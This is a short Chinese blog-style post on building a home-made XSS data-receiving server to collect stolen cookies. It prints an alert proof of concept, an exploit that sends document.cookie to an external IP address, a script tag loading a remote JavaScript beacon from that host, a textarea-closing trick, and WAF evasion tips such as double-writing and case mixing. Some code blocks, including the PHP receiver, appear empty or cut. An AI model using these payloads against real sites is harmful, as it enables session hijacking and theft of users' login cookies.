简易XSS数据接收平台实现
尝试了现有的框架XSS Platform和xss BlueLotus,功能丰富,但是总是难以接收到数据。故出此下策,用自己的云服务器搭建简易的XSS数据接收平台。
PoC<script>alert("xsshack!");</script>
hack.php
1 |
|
上面这个php便可以接收cookie值并存入文件中,搭配下面Exp使用即可。<script>window.open('http://43.139.207.11/xsshack/hack.php?cookie='+document.cookie)</script>
如果遇见一些WAF对php或者cookie等关键词做屏蔽的话,可以搭配下面的js文件进行使用。
hack.js
1 | var img = new Image(); |
此时的Exp如下。<script src= "http://43.139.207.11/xsshack/hack.js"></script>
有时候需要对前面的文本域做一些闭合。</textarea>
对众多WAF的绕过姿势类似于sql注入,比如双写、大小写混合、空格等等。/**/